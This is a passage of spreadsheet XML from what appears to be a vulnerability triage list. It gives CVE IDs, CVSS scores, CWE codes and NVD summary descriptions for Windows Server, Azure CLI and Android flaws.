t="inlineStr"><is><t>HIGH</t></is></c><c r="F402" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G402" s="5" t="inlineStr" /><c r="H402" s="5" t="n"><v>0.007</v></c><c r="I402" s="5" t="inlineStr" /><c r="J402" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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02" s="5" t="inlineStr" /><c r="M402" s="5" t="inlineStr" /><c r="N402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P402" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q402" s="5" t="inlineStr" /><c r="R402" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S402" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T402" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t></is></c></row><row r="403"><c r="A403" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C403" s="5" t="inlineStr"><is><t>CVE-2026-69847</t></is></c><c r="D403" s="5" t="n"><v>8</v></c><c r="E403" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F403" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G403" s="5" t="inlineStr" /><c r="H403" s="5" t="n"><v>0.005</v></c><c r="I403" s="5" t="inlineStr" /><c r="J403" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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03" s="5" t="inlineStr" /><c r="M403" s="5" t="inlineStr" /><c r="N403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q403" s="5" t="inlineStr" /><c r="R403" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S403" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T403" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t></is></c></row><row r="404"><c r="A404" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C404" s="5" t="inlineStr"><is><t>CVE-2026-69875</t></is></c><c r="D404" s="5" t="n"><v>8</v></c><c r="E404" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F404" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G404" s="5" t="inlineStr" /><c r="H404" s="5" t="n"><v>0.008</v></c><c r="I404" s="5" t="inlineStr" /><c r="J404" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K404"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404" s="5" t="inlineStr" /><c r="M404" s="5" t="inlineStr" /><c r="N404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P404" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q404" s="5" t="inlineStr" /><c r="R404" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S404" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T404" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t></is></c></row><row r="405"><c r="A405" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C405" s="5" t="inlineStr"><is><t>CVE-2026-69876</t></is></c><c r="D405" s="5" t="n"><v>8</v></c><c r="E405" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F405" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G405" s="5" t="inlineStr" /><c r="H405" s="5" t="n"><v>0.006</v></c><c r="I405" s="5" t="inlineStr" /><c r="J405" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K405" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L405" s="5" t="inlineStr" /><c r="M405" s="5" t="inlineStr" /><c r="N405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P405" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q405" s="5" t="inlineStr" /><c r="R405" s="5" t="inlineStr"><is><t>CWE-415, CWE-416</t></is></c><c r="S405" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T405" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t></is></c></row><row r="406"><c r="A406" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C406" s="5" t="inlineStr"><is><t>CVE-2026-83948</t></is></c><c r="D406" s="5" t="n"><v>8</v></c><c r="E406" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F406" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G406" s="5" t="inlineStr" /><c r="H406" s="5" t="n"><v>0.004</v></c><c r="I406" s="5" t="inlineStr" /><c r="J406" s="5" t="inlineStr" /><c r="K406" s="5" t="inlineStr"><is><t>microsoft:vm_repair</t></is></c><c r="L406" s="5" t="inlineStr" /><c r="M406" s="5" t="inlineStr" /><c r="N406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P406" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q406" s="5" t="inlineStr" /><c r="R406" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S406" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t></is></c><c r="T406" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t></is></c></row><row r="407"><c r="A407" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C407" s="5" t="inlineStr"><is><t>CVE-2026-0065</t></is></c><c r="D407" s="5" t="n"><v>7.8</v></c><c r="E407" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F407" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G407" s="5" t="inlineStr" /><c r="H407" s="5" t="n"><v>0.001</v></c><c r="I407" s="5" t="inlineStr" /><c r="J407" s="5" t="inlineStr" /><c r="K407" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L407" s="5" t="inlineStr" /><c r="M407" s="5" t="inlineStr" /><c r="N407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P407" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q407" s="5" t="inlineStr" /><c r="R407" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S407" s="5" t="inlineStr"><is><t>In areBackgroundActivityStartsAllowed of BackgroundLaunchProcessController.java, there is a possible unintended way to launch activities in the background due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T407" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t></is></c></row><row r="408"><c r="A408" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C408" s="5" t="inlineStr"><is><t>CVE-2026-0084</t></is></c><c r="D408" s="5" t="n"><v>7.8</v></c><c r="E408" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F408" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G408" s="5" t="inlineStr" /><c r="H408" s="5" t="n"><v>0.001</v></c><c r="I408" s="5" t="inlineStr" /><c r="J408" s="5" t="inlineStr" /><c r="K408" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L408" s="5" t="inlineStr" /><c r="M408" s="5" t="inlineStr" /><c r="N408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P408" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q408" s="5" t="inlineStr" /><c r="R408" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S408" s="5" t="inlineStr"><is><t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T408" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t></is></c></row><row r="409"><c r="A409" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C409" s="5" t="inlineStr"><is><t>CVE-2026-28572</t></is></c><c r="D409" s="5" t="n"><v>7.8</v></c><c r="E409" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F409" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G409" s="5" t="inlineStr" /><c r="H409" s="5" t="n"><v>0.001</v></c><c r="I409" s="5" t="inlineStr" /><c r="J409" s="5" t="inlineStr" /><c r="K409" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L409" s="5" t="inlineStr" /><c r="M409" s="5" t="inlineStr" /><c r="N409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P409" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q409" s="5" t="inlineStr" /><c r="R409" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S409" s="5" t="inlineStr"><is><t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T409" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t></is></c></row><row r="410"><c r="A410" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C410" s="5" t="inlineStr"><is><t>CVE-2026-28583</t></is></c><c r="D410" s="5" t="n"><v>7.8</v></c><c r="E410" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F410" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G410" s="5" t="inlineStr" /><c r="H410" s="5" t="n"><v>0.001</v></c><c r="I410" s="5" t="inlineStr" /><c r="J410" s="5" t="inlineStr" /><c r="K410" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L410" s="5" t="inlineStr" /><c r="M410" s="5" t="inlineStr" /><c r="N410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P410" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q410" s="5" t="inlineStr" /><c r="R410" s="5" t="inlineStr"><is><t>CWE-693, CWE-787</t></is></c><c r="S410" s="5" t="inlineStr"><is><t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T410" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t></is></c></row><row r="411"><c r="A411" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C411" s="5" t="inlineStr"><is><t>CVE-2026-28590</t></is></c><c r="D411" s="5" t="n"><v>7.8</v></c><c r="E411" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F411" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G411" s="5" t="inlineStr" /><c r="H411" s="5" t="n"><v>0.001</v></c><c r="I411" s="5" t="inlineStr" /><c r="J411" s="5" t="inlineStr" /><c r="K411" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L411" s="5" t="inlineStr" /><c r="M411" s="5" t="inlineStr" /><c r="N411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P411" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q411" s="5" t="inlineStr" /><c r="R411" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S411" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T411" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t></is></c></row><row r="412"><c r="A412" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C412" s="5" t="inlineStr"><is><t>CVE-2026-28593</t></is></c><c r="D412" s="5" t="n"><v>7.8</v></c><c r="E412" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F412" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G412" s="5" t="inlineStr" /><c r="H412" s="5" t="n"><v>0.001</v></c><c r="I412" s="5" t="inlineStr" /><c r="J412" s="5" t="inlineStr" /><c r="K412" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L412" s="5" t="inlineStr" /><c r="M412" s="5" t="inlineStr" /><c r="N412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P412" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q412" s="5" t="inlineStr" /><c r="R412" s="5" t="inlineStr"><is><t>CWE-356</t></is></c><c r="S412" s="5" t="inlineStr"><is><t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T412" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t></is></c></row><row r="413"><c r="A413" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C413" s="5" t="inlineStr"><is><t>CVE-2026-28594</t></is></c><c r="D413" s="5" t="n"><v>7.8</v></c><c r="E413" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F413" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G413" s="5" t="inlineStr" /><c r="H413" s="5" t="n"><v>0.001</v></c><c r="I413" s="5" t="inlineStr" /><c r="J413" s="5" t="inlineStr" /><c r="K413" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L413" s="5" t="inlineStr" /><c r="M413" s="5" t="inlineStr" /><c r="N413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P413" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q413" s="5" t="inlineStr" /><c r="R413" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S413" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T413" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t></is></c></row><row r="414"><c r="A414" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C414" s="5" t="inlineStr"><is><t>CVE-2026-28599</t></is></c><c r="D414" s="5" t="n"><v>7.8</v></c><c r="E414" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F414" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G414" s="5" t="inlineStr" /><c r="H414" s="5" t="n"><v>0.001</v></c><c r="I414" s="5" t="inlineStr" /><c r="J414" s="5" t="inlineStr" /><c r="K414" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L414" s="5" t="inlineStr" /><c r="M414" s="5" t="inlineStr" /><c r="N414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P414" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q414" s="5" t="inlineStr" /><c r="R414" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S414" s="5" t="inlineStr"><is><t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T414" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t></is></c></row><row r="415"><c r="A415" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C415" s="5" t="inlineStr"><is><t>CVE-2026-28600</t></is></c><c r="D415" s="5" t="n"><v>7.8</v></c><c r="E415" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F415" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G415" s="5" t="inlineStr" /><c r="H415" s="5" t="n"><v>0.001</v></c><c r="I415" s="5" t="inlineStr" /><c r="J415" s="5" t="inlineStr" /><c r="K415" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L415" s="5" t="inlineStr" /><c r="M415" s="5" t="inlineStr" /><c r="N415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P415" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q415" s="5" t="inlineStr" /><c r="R415" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S415" s="5" t="inlineStr"><is><t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T415" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t></is></c></row><row r="416"><c r="A416" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C416" s="5" t="inlineStr"><is><t>CVE-2026-28602</t></is></c><c r="D416" s="5" t="n"><v>7.8</v></c><c r="E416" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F416" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G416" s="5" t="inlineStr" /><c r="H416" s="5" t="n"><v>0.001</v></c><c r="I416" s="5" t="inlineStr" /><c r="J416" s="5" t="inlineStr" /><c r="K416" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L416" s="5" t="inlineStr" /><c r="M416" s="5" t="inlineStr" /><c r="N416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P416" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q416" s="5" t="inlineStr" /><c r="R416" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S416" s="5" t="inlineStr"><is><t>In setClipboardAccessNotificationsEnabledForUser of ClipboardService.java, there is a possible mult-iuser isolation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T416" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t></is></c></row><row r="417"><c r="A417" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C417" s="5" t="inlineStr"><is><t>CVE-2026-28603</t></is></c><c r="D417" s="5" t="n"><v>7.8</v></c><c r="E417" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F417" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G417" s="5" t="inlineStr" /><c r="H417" s="5" t="n"><v>0.001</v></c><c r="I417" s="5" t="inlineStr" /><c r="J417" s="5" t="inlineStr" /><c r="K417" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L417" s="5" t="inlineStr" /><c r="M417" s="5" t="inlineStr" /><c r="N417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P417" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q417" s="5" t="inlineStr" /><c r="R417" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S417" s="5" t="inlineStr"><is><t>In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible read/write access to private files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T417" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t></is></c></row><row r="418"><c r="A418" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C418" s="5" t="inlineStr"><is><t>CVE-2026-28607</t></is></c><c r="D418" s="5" t="n"><v>7.8</v></c><c r="E418" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F418" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G418" s="5" t="inlineStr" /><c r="H418" s="5" t="n"><v>0.001</v></c><c r="I418" s="5" t="inlineStr" /><c r="J418" s="5" t="inlineStr" /><c r="K418" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L418" s="5" t="inlineStr" /><c r="M418" s="5" t="inlineStr" /><c r="N418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P418" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q418" s="5" t="inlineStr" /><c r="R418" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S418" s="5" t="inlineStr"><is><t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T418" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t></is></c></row><row r="419"><c r="A419" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C419" s="5" t="inlineStr"><is><t>CVE-2026-28611</t></is></c><c r="D419" s="5" t="n"><v>7.8</v></c><c r="E419" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F419" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G419" s="5" t="inlineStr" /><c r="H419" s="5" t="n"><v>0.001</v></c><c r="I419" s="5" t="inlineStr" /><c r="J419" s="5" t="inlineStr" /><c r="K419" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L419" s="5" t="inlineStr" /><c r="M419" s="5" t="inlineStr" /><c r="N419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P419" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q419" s="5" t="inlineStr" /><c r="R419" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S419" s="5" t="inlineStr"><is><t>In multiple functions of NfcService.java, there is a possible silent payment session hijacking enablement due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T419" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t></is></c></row><row r="420"><c r="A420" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C420" s="5" t="inlineStr"><is><t>CVE-2026-28612</t></is></c><c r="D420" s="5" t="n"><v>7.8</v></c><c r="E420" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F420" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G420" s="5" t="inlineStr" /><c r="H420" s="5" t="n"><v>0.001</v></c><c r="I420" s="5" t="inlineStr" /><c r="J420" s="5" t="inlineStr" /><c r="K420" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L420" s="5" t="inlineStr" /><c r="M420" s="5" t="inlineStr" /><c r="N420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P420" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q420" s="5" t="inlineStr" /><c r="R420" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S420" s="5" t="inlineStr"><is><t>In resolveActivity of ActivityStarter.java, there is a possible way to perform Intent Redirection attacks due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T420" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t></is></c></row><row r="421"><c r="A421" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C421" s="5" t="inlineStr"><is><t>CVE-2026-28614</t></is></c><c r="D421" s="5" t="n"><v>7.8</v></c><c r="E421" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F421" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G421" s="5" t="inlineStr" /><c r="H421" s="5" t="n"><v>0.001</v></c><c r="I421" s="5" t="inlineStr" /><c r="J421" s="5" t="inlineStr" /><c r="K421" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L421" s="5" t="inlineStr" /><c r="M421" s="5" t="inlineStr" /><c r="N421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P421" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q421" s="5" t="inlineStr" /><c r="R421" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S421" s="5" t="inlineStr"><is><t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T421" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t></is></c></row><row r="422"><c r="A422" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C422" s="5" t="inlineStr"><is><t>CVE-2026-28616</t></is></c><c r="D422" s="5" t="n"><v>7.8</v></c><c r="E422" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F422" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G422" s="5" t="inlineStr" /><c r="H422" s="5" t="n"><v>0.001</v></c><c r="I422" s="5" t="inlineStr" /><c r="J422" s="5" t="inlineStr" /><c r="K422" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L422" s="5" t="inlineStr" /><c r="M422" s="5" t="inlineStr" /><c r="N422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P422" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q422" s="5" t="inlineStr" /><c r="R422" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S422" s="5" t="inlineStr"><is><t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T422" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t></is></c></row><row r="423"><c r="A423" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C423" s="5" t="inlineStr"><is><t>CVE-2026-28620</t></is></c><c r="D423" s="5" t="n"><v>7.8</v></c><c r="E423" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F423" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G423" s="5" t="inlineStr" /><c r="H423" s="5" t="n"><v>0.001</v></c><c r="I423" s="5" t="inlineStr" /><c r="J423" s="5" 